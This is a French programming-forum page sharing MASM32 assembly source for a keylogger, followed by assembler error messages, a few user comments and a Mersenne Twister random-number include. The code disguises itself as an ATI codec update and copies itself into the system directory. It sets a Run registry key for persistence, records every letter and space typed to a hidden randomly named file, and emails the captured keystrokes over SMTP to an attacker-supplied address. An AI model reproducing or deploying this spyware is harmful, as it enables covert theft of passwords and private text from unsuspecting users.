Soyez le premier à donner votre avis sur cette source.
Snippet vu 7 714 fois - Téléchargée 25 fois
.386 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\user32.inc includelib \masm32\lib\user32.lib include \masm32\include\kernel32.inc includelib \masm32\lib\kernel32.lib include \masm32\include\rand.inc include \masm32\include\wininet.inc includelib \masm32\lib\wininet.lib include \masm32\include\wsock32.inc includelib \masm32\lib\wsock32.lib include \masm32\include\advapi32.inc includelib \masm32\lib\advapi32.lib Mys PROTO :DWORD Defini MACRO Name, Text:VARARG LOCAL lbl jmp lbl Name dd Text,0 lbl: ENDM WinMain proto :DWORD,:DWORD,:DWORD,:DWORD .DATA buffer db "smtp.wanadoo.fr",0 ClassName db "WinClasseAti",0 AppName db "AtiUpdate",0 NbByteWritten dd 0 Demain dd ? Fiere dd 0 Ordre dd ? Soleil db "\",0 Ainsi db "CodecAti4869.exe",0 HELO db "EHLO smtp.wanadoo.fr",13 ,10 ,0 MAIL_FROM db "MAIL FROM: <Cequelledi@aol.com>",13 ,10 ,0 RCPT_TO db "RCPT TO: <Email@wanadoo.fr>",13 ,10 ,0 ;<---mettez ici votre E@mail DONNEES db "DATA",13 ,10 ,0 TEXTE db " ",13 ,10 ,13 ,10 ,0 FIN_DONNEES db ".",13 ,10 ,0 RegistreRun db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 FERME db "QUIT",13 ,10 ,0 wsadata WSADATA <> sin sockaddr_in <> Port dd 25 .DATA? hInstance HINSTANCE ? CommandLine LPSTR ? hFile dd ? Nom db 8 dup(?) Lettre db 1 dup(?) Information db 255 dup (?) sock dd ? buf db 255 dup (?) CheminSystem db 256 dup(?) Regarder db 256 dup(?) CheminExec db 256 dup(?) hReg dd ? ip dd ? .CODE start: invoke GetModuleFileName,0,addr Regarder,sizeof Regarder invoke GetSystemDirectory,addr CheminSystem,sizeof CheminSystem invoke lstrcat,addr CheminExec,addr CheminSystem invoke lstrcat,addr CheminExec,addr Soleil invoke lstrcat,addr CheminExec,addr Ainsi invoke CopyFile,addr Regarder,addr CheminExec,0 invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, addr RegistreRun , 0, 00020000h+0002h+0004h, addr hReg invoke RegSetValueEx, hReg, ADDR Ainsi, 0, 1, addr CheminExec,sizeof CheminExec invoke RegCloseKey, hReg INVOKE GetTickCount INVOKE Randomize,eax invoke GetModuleHandle, NULL mov hInstance,eax invoke GetCommandLine ; mov CommandLine,eax invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT invoke ExitProcess, eax WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD LOCAL wc:WNDCLASSEX LOCAL msg:MSG LOCAL hwnd:HWND mov wc.cbSize,SIZEOF WNDCLASSEX mov wc.style, CS_HREDRAW or CS_VREDRAW mov wc.lpfnWndProc, OFFSET WndProc mov wc.cbClsExtra,NULL mov wc.cbWndExtra,NULL push hInstance pop wc.hInstance mov wc.hbrBackground,COLOR_WINDOW+1 mov wc.lpszMenuName,NULL mov wc.lpszClassName,OFFSET ClassName invoke LoadIcon,NULL,IDI_APPLICATION mov wc.hIcon,eax mov wc.hIconSm,eax invoke LoadCursor,NULL,IDC_ARROW mov wc.hCursor,eax invoke RegisterClassEx, addr wc invoke CreateWindowEx,NULL, ADDR ClassName, ADDR AppName, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, hInst, NULL .WHILE TRUE invoke GetMessage, ADDR msg,NULL,0,0 .BREAK .IF (!eax) invoke TranslateMessage, ADDR msg invoke DispatchMessage, ADDR msg .ENDW mov eax,msg.wParam ret WinMain endp WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM Invoke SetTimer,hWnd,0,100, 0 .if uMsg == WM_TIMER invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE, addr RegistreRun , 0, 00020000h+0002h+0004h, addr hReg invoke RegSetValueEx, hReg, ADDR Ainsi, 0, 1, addr CheminExec,sizeof CheminExec invoke RegCloseKey, hReg invoke InternetGetConnectedState, ADDR Fiere, 0 test eax, eax jnz @@on_line jmp @@exit @@on_line: Invoke GetAsyncKeyState, VK_A .if eax != 0 inc Ordre Defini Def,"A" invoke lstrcat,addr Information, addr Def push 0 push offset NbByteWritten push 1 push offset Def push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_B .if eax != 0 inc Ordre Defini Def1,"B" invoke lstrcat,addr Information, addr Def1 push 0 push offset NbByteWritten push 1 push offset Def1 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_C .if eax != 0 inc Ordre Defini Def2,"C" invoke lstrcat,addr Information, addr Def2 push 0 push offset NbByteWritten push 1 push offset Def2 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_D .if eax != 0 inc Ordre Defini Def3,"D" invoke lstrcat,addr Information, addr Def3 push 0 push offset NbByteWritten push 1 push offset Def3 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_E .if eax != 0 inc Ordre Defini Def4,"E" invoke lstrcat,addr Information, addr Def4 push 0 push offset NbByteWritten push 1 push offset Def4 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_F .if eax != 0 inc Ordre Defini Def5,"F" invoke lstrcat,addr Information, addr Def5 push 0 push offset NbByteWritten push 1 push offset Def5 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_G .if eax != 0 inc Ordre Defini Def6,"G" invoke lstrcat,addr Information, addr Def6 push 0 push offset NbByteWritten push 1 push offset Def6 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_H .if eax != 0 inc Ordre Defini Def7,"H" invoke lstrcat,addr Information, addr Def7 push 0 push offset NbByteWritten push 1 push offset Def7 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_I .if eax != 0 inc Ordre Defini Def8,"I" invoke lstrcat,addr Information, addr Def8 push 0 push offset NbByteWritten push 1 push offset Def8 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_J .if eax != 0 inc Ordre Defini Def9,"J" invoke lstrcat,addr Information, addr Def9 push 0 push offset NbByteWritten push 1 push offset Def9 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_K .if eax != 0 inc Ordre Defini Def10,"K" invoke lstrcat,addr Information, addr Def10 push 0 push offset NbByteWritten push 1 push offset Def10 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_L .if eax != 0 inc Ordre Defini Def11,"L" invoke lstrcat,addr Information, addr Def11 push 0 push offset NbByteWritten push 1 push offset Def11 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_M .if eax != 0 inc Ordre Defini Def12,"M" invoke lstrcat,addr Information, addr Def12 push 0 push offset NbByteWritten push 1 push offset Def12 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_N .if eax != 0 inc Ordre Defini Def13,"N" invoke lstrcat,addr Information, addr Def13 push 0 push offset NbByteWritten push 1 push offset Def13 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_O .if eax != 0 inc Ordre Defini Def14,"O" invoke lstrcat,addr Information, addr Def14 push 0 push offset NbByteWritten push 1 push offset Def14 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_P .if eax != 0 inc Ordre Defini Def15,"P" invoke lstrcat,addr Information, addr Def15 push 0 push offset NbByteWritten push 1 push offset Def15 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_Q .if eax != 0 inc Ordre Defini Def16,"Q" invoke lstrcat,addr Information, addr Def16 push 0 push offset NbByteWritten push 1 push offset Def16 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_R .if eax != 0 inc Ordre Defini Def17,"R" invoke lstrcat,addr Information, addr Def17 push 0 push offset NbByteWritten push 1 push offset Def17 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_S .if eax != 0 inc Ordre Defini Def18,"S" invoke lstrcat,addr Information, addr Def18 push 0 push offset NbByteWritten push 1 push offset Def18 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_T .if eax != 0 inc Ordre Defini Def19,"T" invoke lstrcat,addr Information, addr Def19 push 0 push offset NbByteWritten push 1 push offset Def19 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_U .if eax != 0 inc Ordre Defini Def20,"U" invoke lstrcat,addr Information, addr Def20 push 0 push offset NbByteWritten push 1 push offset Def20 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_V .if eax != 0 inc Ordre Defini Def21,"V" invoke lstrcat,addr Information, addr Def21 push 0 push offset NbByteWritten push 1 push offset Def21 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_W .if eax != 0 inc Ordre Defini Def22,"W" invoke lstrcat,addr Information, addr Def22 push 0 push offset NbByteWritten push 1 push offset Def22 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_X .if eax != 0 inc Ordre Defini Def23,"X" invoke lstrcat,addr Information, addr Def23 push 0 push offset NbByteWritten push 1 push offset Def23 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_Y .if eax != 0 inc Ordre Defini Def24,"Y" invoke lstrcat,addr Information, addr Def24 push 0 push offset NbByteWritten push 1 push offset Def24 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_Z .if eax != 0 inc Ordre Defini Def25,"Z" invoke lstrcat,addr Information, addr Def25 push 0 push offset NbByteWritten push 1 push offset Def25 push hFile call WriteFile .endif Invoke GetAsyncKeyState, VK_SPACE .if eax != 0 inc Ordre Defini Def26," " invoke lstrcat,addr Information, addr Def26 push 0 push offset NbByteWritten push 1 push offset Def26 push hFile call WriteFile .endif .if Ordre == 100 mov Ordre,0 invoke WSAStartup,101h,addr wsadata ;initialise le socket invoke socket,AF_INET,SOCK_STREAM,IPPROTO_IP mov sock,eax mov sin.sin_family,AF_INET ;famille de socket invoke htons,Port ;port 25 mov sin.sin_port,ax invoke inet_addr,addr buffer mov ip,eax .if eax==INADDR_NONE invoke gethostbyname,addr buffer .if eax!=NULL mov eax,[eax+12] mov eax,[eax] mov eax,[eax] invoke inet_ntoa,eax .else jmp endit .endif .else invoke gethostbyaddr,addr ip,4,2 .if eax == 0 jmp endit .endif mov eax,[eax] .endif endit: invoke inet_addr, eax ;ip du smtp mov sin.sin_addr, eax invoke connect, sock, addr sin ,sizeof sin ;on se connecte invoke recv, sock, addr buf, sizeof buf, 0 ;et affiche la reponse ; HELO SERVER invoke Mys, addr HELO ;envoit HELO smtp.infonie.be invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr HELO, MB_OK ; MAIL TO: invoke Mys, addr MAIL_FROM ;envoit MAIL FROM: invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr MAIL_FROM, MB_OK ; RCPT TO: invoke Mys, addr RCPT_TO ;envoit RCPT TO: invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr RCPT_TO, MB_OK ; DATA invoke Mys, addr DONNEES ;envoit DATA invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr DONNEES, MB_OK invoke lstrcat,addr Information, addr TEXTE invoke Mys, addr Information ;envoit le text ; DATA invoke Mys, addr FIN_DONNEES ;envoit . invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr FIN_DONNEES, MB_OK ; DATA invoke Mys, addr FERME ;envoit QUIT invoke recv, sock, addr buf, sizeof buf, 0 ;invoke MessageBox,0,addr buf, addr FERME, MB_OK mov Information,0 invoke closesocket,sock ;ferme le socket et quit .endif @@exit: .elseif uMsg == WM_CREATE INVOKE GetTickCount INVOKE Randomize,eax mov Ordre,0 mov Demain,0 GenereNom: INVOKE Rand,26 add al,97 mov Lettre,al invoke lstrcat,addr Nom, addr Lettre inc Demain cmp Demain,7 jng GenereNom invoke lstrcat,addr CheminSystem, addr Soleil invoke lstrcat,addr CheminSystem, addr Nom invoke CreateFile,ADDR CheminSystem,GENERIC_WRITE,FILE_SHARE_READ, 0,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 mov hFile,eax .endif invoke DefWindowProc,hWnd,uMsg,wParam,lParam ret WndProc endp Mys proc SendStr : DWORD push edi mov edi, SendStr .WHILE TRUE .BREAK .IF (byte ptr [edi] == 0 ) invoke send, sock, edi, 1, 0 inc edi .ENDW pop edi ret Mys endp end start
error A2008: syntax error : endif
fatal error A1010: unmatched block nesting : .if-.repeat-.while
Ce code montre comment intercepter tte les saisie au clavier à l'aide d'un hook... très instructif
Même pas capable de faire confiance !!!
J'ai honte !!!
Mais où vas le monde !
Rand proto :DWORD ;Generates a number on [0,Max-1]
Randomize proto :DWORD ;Changes the seed for Rand
.const
N equ 624
M equ 397
MATRIX_A equ 9908b0dfh
TEMPERING_MASK_B equ 9d2c5680h
TEMPERING_MASK_C equ 0efc60000h
UM equ 80000000h
LM equ 7fffffffh
.data
mti dd (N+1)
MC dd 69069
.data?
mt dd 2496 dup(?)
.code
Randomize proc Seed:DWORD
lea edi,mt
mov eax,Seed
mov [edi],eax
mov mti,1
@R: add edi,4
mul MC
mov [edi],eax
inc mti
cmp mti,N
jnz @R
ret
Randomize endp
Rand proc Max:DWORD
LOCAL Counter:DWORD
lea edi,mt
.IF mti>=N
.IF mti==N+1
INVOKE Randomize,4357
.ENDIF
mov Counter,0
mov esi,edi
@S: mov eax,[esi]
and eax,UM
mov ebx,[esi+4]
and ebx,LM
or eax,ebx
mov ecx,eax
shr eax,1
mov edx,esi
add edx,(M*4)
mov ebx,[edx]
xor eax,ebx
and ecx,1
.IF ecx
xor eax,MATRIX_A
.ENDIF
mov [esi],eax
add esi,4
inc Counter
cmp Counter,(N-M)
jnz @S
@T: mov eax,[esi]
and eax,UM
mov ebx,[esi+4]
and ebx,LM
or eax,ebx
mov ecx,eax
shr eax,1
mov edx,esi
add edx,((M-N)*4)
mov ebx,[edx]
xor eax,ebx
and ecx,1
.IF ecx
xor eax,MATRIX_A
.ENDIF
mov [esi],eax
add esi,4
inc Counter
cmp Counter,(N-1)
jnz @T
mov edx,edi
add edx,(M-1)*4
mov ebx,[edx]
xor eax,ebx
and ecx,1
.IF ecx
xor eax,MATRIX_A
.ENDIF
mov [esi],eax
mov mti,0
.ENDIF
mov esi,edi
mov eax,mti
inc mti
shl eax,2
add esi,eax
mov eax,[esi]
mov ebx,eax
shr eax,11
xor ebx,eax
mov eax,ebx
shl eax,7
and eax,TEMPERING_MASK_B
xor ebx,eax
mov eax,ebx
shl eax,15
and eax,TEMPERING_MASK_C
xor ebx,eax
mov eax,ebx
shr eax,18
xor eax,ebx
xor edx,edx
div Max
mov eax,edx
ret
Rand endp
Vous n'êtes pas encore membre ?
inscrivez-vous, c'est gratuit et ça prend moins d'une minute !
Les membres obtiennent plus de réponses que les utilisateurs anonymes.
Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.
Le fait d'être membre vous permet d'avoir des options supplémentaires.